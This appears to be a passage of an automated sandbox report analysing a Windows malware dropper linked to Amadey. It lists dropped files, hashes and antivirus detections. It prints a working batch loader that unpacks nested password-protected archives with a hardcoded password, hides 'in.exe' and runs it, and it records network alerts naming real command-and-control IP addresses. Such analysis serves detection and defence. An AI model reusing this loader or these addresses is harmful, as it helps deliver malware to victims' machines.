                                                                                                                                                              Preview:PK........n..Y...rDv..Dv......file_2.zipPK........n..Y*C.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^.*..T.-f..$k.b..#&.B.v...s.s....{.......{..|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........*(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s|&Fj..T:.m..*.J..sk..t.\K*]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....|...|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z........H..3k..F..:....X2a.e..G..f6...}....H.V.#r.H....T.....!....~...R%xu..
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                              File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1800056
                                                                                                                                                              Entropy (8bit):7.997723543142523
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:49152:Zyj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJQ:Yj13Trb6i5iGmuXZTbBizt0Jhm
                                                                                                                                                              MD5:7187CC2643AFFAB4CA29D92251C96DEE
                                                                                                                                                              SHA1:AB0A4DE90A14551834E12BB2C8C6B9EE517ACAF4
                                                                                                                                                              SHA-256:C7E92A1AF295307FB92AD534E05FBA879A7CF6716F93AEFCA0EBFCB8CEE7A830
                                                                                                                                                              SHA-512:27985D317A5C844871FFB2527D04AA50EF7442B2F00D69D5AB6BBB85CD7BE1D7057FFD3151D0896F05603677C2F7361ED021EAC921E012D74DA049EF6949E3A3
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:PK........n..Y....v...v......file_3.zipPK........n..Y...rDv..Dv......file_2.zipPK........n..Y*C.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^.*..T.-f..$k.b..#&.B.v...s.s....{.......{..|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........*(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s|&Fj..T:.m..*.J..sk..t.\K*]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....|...|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z........H..3k..F..:....X2a.e..G..f6...}.
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                              File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1800210
                                                                                                                                                              Entropy (8bit):7.997720745184939
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:49152:ayj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJw:Pj13Trb6i5iGmuXZTbBizt0JhG
                                                                                                                                                              MD5:B7D1E04629BEC112923446FDA5391731
                                                                                                                                                              SHA1:814055286F963DDAA5BF3019821CB8A565B56CB8
                                                                                                                                                              SHA-256:4DA77D4EE30AD0CD56CD620F4E9DC4016244ACE015C5B4B43F8F37DD8E3A8789
                                                                                                                                                              SHA-512:79FC3606B0FE6A1E31A2ECACC96623CAF236BF2BE692DADAB6EA8FFA4AF4231D782094A63B76631068364AC9B6A872B02F1E080636EBA40ED019C2949A8E28DB
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:PK........n..Yab..xw..xw......file_4.zipPK........n..Y....v...v......file_3.zipPK........n..Y...rDv..Dv......file_2.zipPK........n..Y*C.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^.*..T.-f..$k.b..#&.B.v...s.s....{.......{..|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........*(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s|&Fj..T:.m..*.J..sk..t.\K*]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....|...|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z..
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                              File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1800364
                                                                                                                                                              Entropy (8bit):7.997716835838842
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:49152:kyj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJv:lj13Trb6i5iGmuXZTbBizt0Jht
                                                                                                                                                              MD5:0DC4014FACF82AA027904C1BE1D403C1
                                                                                                                                                              SHA1:5E6D6C020BFC2E6F24F3D237946B0103FE9B1831
                                                                                                                                                              SHA-256:A29DDD29958C64E0AF1A848409E97401307277BB6F11777B1CFB0404A6226DE7
                                                                                                                                                              SHA-512:CBEEAD189918657CC81E844ED9673EE8F743AED29AD9948E90AFDFBECACC9C764FBDBFB92E8C8CEB5AE47CEE52E833E386A304DB0572C7130D1A54FD9C2CC028
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:PK........n..Y..+..x...x......file_5.zipPK........n..Yab..xw..xw......file_4.zipPK........n..Y....v...v......file_3.zipPK........n..Y...rDv..Dv......file_2.zipPK........n..Y*C.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^.*..T.-f..$k.b..#&.B.v...s.s....{.......{..|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........*(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s|&Fj..T:.m..*.J..sk..t.\K*]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....|...|-... #..Z-.b.Ej...q.u..
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):3473559
                                                                                                                                                              Entropy (8bit):7.9992359395959935
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:98304:8aR3D0Ae5mwdkDWm1Xo4j13Trb6i5iGmuXZTbBizt0Jhd:ds5m6sXoArb6iguZnBi5Qd
                                                                                                                                                              MD5:CEA368FC334A9AEC1ECFF4B15612E5B0
                                                                                                                                                              SHA1:493D23F72731BB570D904014FFDACBBA2334CE26
                                                                                                                                                              SHA-256:07E38CAD68B0CDBEA62F55F9BC6EE80545C2E1A39983BAA222E8AF788F028541
                                                                                                                                                              SHA-512:BED35A1CC56F32E0109EA5A02578489682A990B5CEFA58D7CF778815254AF9849E731031E824ADBA07C86C8425DF58A1967AC84CE004C62E316A2E51A75C8748
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:PK........n..Y`.T......#.....AntiAV.data..E..@.D..C/qwg..;...mG.3H..|...$..}.`..8......lV1*..4...Cu.H.(l+{Cl.:........$+Nr....\.u.K_1N:k.'....F...... .....+.70..R.>..A..#6L.:..n..7......Y..y......v.,....=...e....fe.4.@...h..+....=.#...T....*..A..|...{A.p{.b*.|.[...Q...z.v.....iD.....W.....;...........YVL._._.F..4./g;syC.....e,.N..>t.43..p.T4?.K.....:Z.XDVS.gj.)cp..A9.7^.d.M.d.j..c:.(T<J._3-..8.,."s.'...B\.q...\..e.!..{l.\.]'.P.2}..l@^.G...{n..p..u.n.1;W..#..p.A.YD7.....,.o..z;.6T../.w..=.3K5..]............U...,r....n....(..I.....Q.o%.NF..Q.h$y.".7.tU..eVe.b.q.S4%"C..$g..iX..XQl..?Z.U.|.g....&.d..Y.|..5O...s.|..A..@.Y1F.o.o.s.'UY.AU#....D.K.....A....=t.M..L4...{.....BF.Rg.-...j..p.c..'.2....].m..w37t...Rn.r....v....W..g0E......)-.6.=v/.9...o..~.mh.U.&...5.ld4k.gG.G.S.w4G..]'.5......r..Q.U.U.9.Vv....2.>....p.s.p..e....(..}Jox.....Z..[Y..ku.....5....s.././....:...v......h.u.ZlG.>).,.(....Ye<.....3...:T:)...-).=.L.=.2F....&H7..j..\.B6.Ox.\....
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1827328
                                                                                                                                                              Entropy (8bit):7.963282633529333
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:49152:2AVavyjrvfTYx9Z+tylUcecGjcM7B68ue7KhNzw:2AkvyvfTYxTUTj77B68uRe
                                                                                                                                                              MD5:83D75087C9BF6E4F07C36E550731CCDE
                                                                                                                                                              SHA1:D5FF596961CCE5F03F842CFD8F27DDE6F124E3AE
                                                                                                                                                              SHA-256:46DB3164BEBFFC61C201FE1E086BFFE129DDFED575E6D839DDB4F9622963FB3F
                                                                                                                                                              SHA-512:044E1F5507E92715CE9DF8BB802E83157237A2F96F39BAC3B6A444175F1160C4D82F41A0BCECF5FEAF1C919272ED7929BAEF929A8C3F07DEECEBC44B0435164A
                                                                                                                                                              Malicious:true
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 67%
                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....Pg.........."...............-...H...-....@..............................I...........`...................................................H...............H...............H...............................H.(.....H.8...........................................UPX0......-.............................UPX1..........-.....................@...UPX2..........H.....................@...4.24.UPX!.$..=g.7....Z.H......zH.I..-.3..VH.. H......................1...MZ...o"uKHcQ<.<.PE.>H..8Q.6...[.J.t..lu'.yt.r!H....y........"....9.o.m.........1ZH....g.n.....l8..0..0..!.0..|..(.(,....8.u....'~....*../.. ^.....(v...w....YR....oD.i....H.D$ ~.9..FL......\..(..<..u....I..D.I...f.AWAVVWS.eN.%0g.....x.5.2.H..>...t.H..}.9.t)L..g..f.H....>....A..Q.u.=.X..........:|...oh.?.....^......;.]uzZ..{Q.s`AF..2PQd......p..B....o...t.1.=E6...'u7.p.)<Z.,(".f....Z..a..,+.GLO,v...\=^X...
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exe
                                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):3473725
                                                                                                                                                              Entropy (8bit):7.999948676888215
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:49152:9b8s3/pc44zfeVeY45ZADJE7ZdXrYX+RyWGGdVPLv7+joMMPlHxNwNrRPXD3tI:LP0eQz5Zwm7ZdEOhdLrK0l2FpI
                                                                                                                                                              MD5:045B0A3D5BE6F10DDF19AE6D92DFDD70
                                                                                                                                                              SHA1:0387715B6681D7097D372CD0005B664F76C933C7
                                                                                                                                                              SHA-256:94B392E94FA47D1B9B7AE6A29527727268CC2E3484E818C23608F8835BC1104D
                                                                                                                                                              SHA-512:58255A755531791B888FFD9B663CC678C63D5CAA932260E9546B1B10A8D54208334725C14529116B067BCF5A5E02DA85E015A3BED80092B7698A43DAB0168C7B
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:PK........n..Yd=,..5...5.....file_7.zipm..+]..E....`...._..'.....DXW|._6.Kau^.O....W.0.....fE....Q:.t`9.9"..c.... .[(2..[m{.`S.?8...w.v.{zo/a....E..L.1..<.....].@.....:...3?. k.5....H.=......0.A.,3p......_R.......[.7....j.Ba$v1AO.@q....x...u..9.k..z.p...5.....-(.b...y.........S.../..l.Q.....)....w..@...w;.;2.&Q.w.....Hn.3A.z.i..0i%A..E-7.....8....(.Z.A....k.......=.g.,......N.Yt`....)....T.....f..P.....u4ig.......B...~-7...Y]Ct.6.7..PS.Su7yx8...#.......B.3.f."....x.-u.....M.%.a.._\D.5.G....O.P....,b.;=.k[....4......SdS....gL.....X.......G...f.P....p.PS.~.P.}...X.7.+Ap.-.....^'..\.6..r.2.p.wd...dd....(..S..N..#.M....~..L..sjX...,..B.........-..R..~..A..B...MF..,.z.........lK.]<"..,...K.~..S.Z...p).......z..I..E.MG.M].....F.SY.p..1...sM7...B...l......g..V...q..p}$%iM....L...N...;.......}/Y8..&zAO&0..s.{.pR.A...Y`..Q.../n..,........z.&.k.`TU...7lv.xQ@~.'..H.S..y...n48......m....s1(.`.....,.n;j...CX.s..sN.L..q.u.G.....q.M..:..xI":Y.
                                                                                                                                                              Process:C:\Windows\System32\cmd.exe
                                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):3473725
                                                                                                                                                              Entropy (8bit):7.999948676888215
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:49152:9b8s3/pc44zfeVeY45ZADJE7ZdXrYX+RyWGGdVPLv7+joMMPlHxNwNrRPXD3tI:LP0eQz5Zwm7ZdEOhdLrK0l2FpI
                                                                                                                                                              MD5:045B0A3D5BE6F10DDF19AE6D92DFDD70
                                                                                                                                                              SHA1:0387715B6681D7097D372CD0005B664F76C933C7
                                                                                                                                                              SHA-256:94B392E94FA47D1B9B7AE6A29527727268CC2E3484E818C23608F8835BC1104D
                                                                                                                                                              SHA-512:58255A755531791B888FFD9B663CC678C63D5CAA932260E9546B1B10A8D54208334725C14529116B067BCF5A5E02DA85E015A3BED80092B7698A43DAB0168C7B
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:PK........n..Yd=,..5...5.....file_7.zipm..+]..E....`...._..'.....DXW|._6.Kau^.O....W.0.....fE....Q:.t`9.9"..c.... .[(2..[m{.`S.?8...w.v.{zo/a....E..L.1..<.....].@.....:...3?. k.5....H.=......0.A.,3p......_R.......[.7....j.Ba$v1AO.@q....x...u..9.k..z.p...5.....-(.b...y.........S.../..l.Q.....)....w..@...w;.;2.&Q.w.....Hn.3A.z.i..0i%A..E-7.....8....(.Z.A....k.......=.g.,......N.Yt`....)....T.....f..P.....u4ig.......B...~-7...Y]Ct.6.7..PS.Su7yx8...#.......B.3.f."....x.-u.....M.%.a.._\D.5.G....O.P....,b.;=.k[....4......SdS....gL.....X.......G...f.P....p.PS.~.P.}...X.7.+Ap.-.....^'..\.6..r.2.p.wd...dd....(..S..N..#.M....~..L..sjX...,..B.........-..R..~..A..B...MF..,.z.........lK.]<"..,...K.~..S.Z...p).......z..I..E.MG.M].....F.SY.p..1...sM7...B...l......g..V...q..p}$%iM....L...N...;.......}/Y8..&zAO&0..s.{.pR.A...Y`..Q.../n..,........z.&.k.`TU...7lv.xQ@~.'..H.S..y...n48......m....s1(.`.....,.n;j...CX.s..sN.L..q.u.G.....q.M..:..xI":Y.
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exe
                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):440
                                                                                                                                                              Entropy (8bit):5.0791308599041844
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12:QUp+CF16g64CTFMj2LIQLvDHW7PCVGrMLvmuCogLKO8NerxVv:QUpNF16g632CkezWDCVGYTOLv8k7
                                                                                                                                                              MD5:3626532127E3066DF98E34C3D56A1869
                                                                                                                                                              SHA1:5FA7102F02615AFDE4EFD4ED091744E842C63F78
                                                                                                                                                              SHA-256:2A0E18EF585DB0802269B8C1DDCCB95CE4C0BAC747E207EE6131DEE989788BCA
                                                                                                                                                              SHA-512:DCCE66D6E24D5A4A352874144871CD73C327E04C1B50764399457D8D70A9515F5BC0A650232763BF34D4830BAB70EE4539646E7625CFE5336A870E311043B2BD
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:..&cls..@echo off..mode 65,10..title g3g34g34g34g43 (34g34g45h6hj56j56j)..md extracted..ren file.bin file.zip..call 7z.exe e file.zip -p24291711423417250691697322505 -oextracted ..for /l %%i in (7,-1,1) do (..call 7z.exe e extracted/file_%%i.zip -oextracted..)..ren file.zip file.bin..cd extracted..move "in.exe" ../..cd....rd /s /q extracted..attrib +H "in.exe"..start "" "in.exe"..cls..echo Launched 'in.exe'...pause..del /f /q "in.exe"..
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\main\in.exe
                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1827328
                                                                                                                                                              Entropy (8bit):7.963282633529333
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:49152:2AVavyjrvfTYx9Z+tylUcecGjcM7B68ue7KhNzw:2AkvyvfTYxTUTj77B68uRe
                                                                                                                                                              MD5:83D75087C9BF6E4F07C36E550731CCDE
                                                                                                                                                              SHA1:D5FF596961CCE5F03F842CFD8F27DDE6F124E3AE
                                                                                                                                                              SHA-256:46DB3164BEBFFC61C201FE1E086BFFE129DDFED575E6D839DDB4F9622963FB3F
                                                                                                                                                              SHA-512:044E1F5507E92715CE9DF8BB802E83157237A2F96F39BAC3B6A444175F1160C4D82F41A0BCECF5FEAF1C919272ED7929BAEF929A8C3F07DEECEBC44B0435164A
                                                                                                                                                              Malicious:true
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 67%
                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....Pg.........."...............-...H...-....@..............................I...........`...................................................H...............H...............H...............................H.(.....H.8...........................................UPX0......-.............................UPX1..........-.....................@...UPX2..........H.....................@...4.24.UPX!.$..=g.7....Z.H......zH.I..-.3..VH.. H......................1...MZ...o"uKHcQ<.<.PE.>H..8Q.6...[.J.t..lu'.yt.r!H....y........"....9.o.m.........1ZH....g.n.....l8..0..0..!.0..|..(.(,....8.u....'~....*../.. ^.....(v...w....YR....oD.i....H.D$ ~.9..FL......\..(..<..u....I..D.I...f.AWAVVWS.eN.%0g.....x.5.2.H..>...t.H..}.9.t)L..g..f.H....>....A..Q.u.=.X..........:|...oh.?.....^......;.]uzZ..{Q.s`AF..2PQd......p..B....o...t.1.=E6...'u7.p.)<Z.,(".f....Z..a..,+.GLO,v...\=^X...
                                                                                                                                                              Process:C:\Users\user\Desktop\random.exe_Y.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):302
                                                                                                                                                              Entropy (8bit):3.4429789127118338
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:6:FjDbXUhXUEZ+lX1CGdKUe6tE9+AQy0lMqut0:FHr4Q1CGAFD9+nVFut0
                                                                                                                                                              MD5:2AA5355810A4A1FA4739A438F5245AFB
                                                                                                                                                              SHA1:5BD40A26D676612A017FAE9DA2FE2287D95C1B0F
                                                                                                                                                              SHA-256:CB19FA2D3AC04C452C1C1DE9C5A77AF124E0683275FDDEE4187A4A203EF1689A
                                                                                                                                                              SHA-512:119AC08A7C277DB0A5894742C4A1F37CDCA5D6129E72839016BE8B11FA344459E74EBE133A4B354BB53F882ACF5689854D611A3E6DF6F4C20E6D78039AAF636A
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:....[E_....F...r}.cF.......<... .....s.......... ....................;.C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........E.N.G.I.N.E.E.R.-.P.C.\.e.n.g.i.n.e.e.r...................0................./.@3P.........................
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                              File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):350
                                                                                                                                                              Entropy (8bit):5.0682682106683945
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:6:AMMyS3pt+uoQcAxXF2SaioBQypHSTgqF1AivwtHgNmtQFfpap1tNjtv:pMpDh5RwXSTgqFyYwzuJA1tNp
                                                                                                                                                              MD5:2F644B7E25627553C5731B735473C859
                                                                                                                                                              SHA1:5A3C2158A1FCF27AE6807A8079894FFE8D33FBEA
                                                                                                                                                              SHA-256:2B34B0DE62F49C19D1F9A004AD698E2612F7FCD5072F5C9834621C62F15FB55F
                                                                                                                                                              SHA-512:E83CA818C9785EB3A0297E65F08E22DC9E29A368BCADC9887B64EC746C88B79ACBAD20B4B6D49C07CB819ACE21B00C2BEB083F18A0CD5528D2BD00A7B0C4E802
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:..7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21....Scanning the drive for archives:.. 0M Scan. .1 file, 1799594 bytes (1758 KiB)....Extracting archive: extracted\file_1.zip..--..Path = extracted\file_1.zip..Type = zip..Physical Size = 1799594.... 0%. .Everything is Ok....Size: 1827328..Compressed: 1799594..
                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Entropy (8bit):6.575662109562546
                                                                                                                                                              TrID:
                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                              File name:random.exe_Y.exe
                                                                                                                                                              File size:2'985'472 bytes
                                                                                                                                                              MD5:5c4d6b420293fbf347f649016fab86f8
                                                                                                                                                              SHA1:242b846ca8d55d7d40527d2494a1a3d83e9cba1e
                                                                                                                                                              SHA256:2f423ea9129684a3f39d3ca8aebc3c470f6895786c4277815307ede64e160deb
                                                                                                                                                              SHA512:e0475c4f8954c40b41a5c56b9024cc5448f82c98877c0964679ace18504255e68a7d6a334c7c29616ffb1fef07b8fd23fb82a8d09c3dc3e30fcb6495ea808fdf
                                                                                                                                                              SSDEEP:49152:gbeCjCycKq+4fXq3hnb/KoTaom8SayudX:gbeCj7cKqZfXq3hbVurayuJ
                                                                                                                                                              TLSH:A8D55C92A445FACBD88B5BB58423CD866D5D03B8072049D3E82D74BEBEE3CC415F9E64
                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C................
                                                                                                                                                              Icon Hash:00928e8e8686b000
                                                                                                                                                              Entrypoint:0x714000
                                                                                                                                                              Entrypoint Section:.taggant
                                                                                                                                                              Digitally signed:false
                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                              Time Stamp:0x66F0569C [Sun Sep 22 17:40:44 2024 UTC]
                                                                                                                                                              TLS Callbacks:
                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                              OS Version Major:6
                                                                                                                                                              OS Version Minor:0
                                                                                                                                                              File Version Major:6
                                                                                                                                                              File Version Minor:0
                                                                                                                                                              Subsystem Version Major:6
                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                              Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                              Instruction
                                                                                                                                                              jmp 00007F3458E3749Ah
                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x6a0570x6b.idata
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x690000x5d4.rsrc
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x31205c0x10xswvdtxt
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x31200c0x18xswvdtxt
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                              0x10000x680000x2de00959cd766827e5a7029f7b2788e29adefFalse0.9982278184604905data7.984148545598198IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                              .rsrc0x690000x5d40x6001e55db351164df1643ae87d7efa3ee0fFalse0.4303385416666667data5.417125179370491IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                              .idata 0x6a0000x10000x200cc76e3822efdc911f469a3e3cc9ce9feFalse0.1484375data1.0428145631430756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                              xswvdtxt0x6b0000x2a80000x2a7200b4ee66cda51e21b4467147fe1a072239unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                              wvmigpas0x3130000x10000x4009467e91aa8c7559c29d56fa3e480474fFalse0.744140625data5.863552655399057IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                              .taggant0x3140000x30000x2200f9260ff9c865ace39a7abfa85990c6f8False0.06020220588235294DOS executable (COM)0.7495252086357653IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                              RT_MANIFEST0x690700x3e4XML 1.0 document, ASCII text0.48092369477911645
                                                                                                                                                              RT_MANIFEST0x694540x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                                                                                                                                                              DLLImport
                                                                                                                                                              kernel32.dlllstrcpy
                                                                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                                                                              EnglishUnited States
                                                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                              2024-12-18T11:47:06.998233+01002856147ETPRO MALWARE Amadey CnC Activity M31192.168.2.649789185.215.113.4380TCP
                                                                                                                                                              2024-12-18T11:47:13.770477+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.64980631.41.244.1180TCP
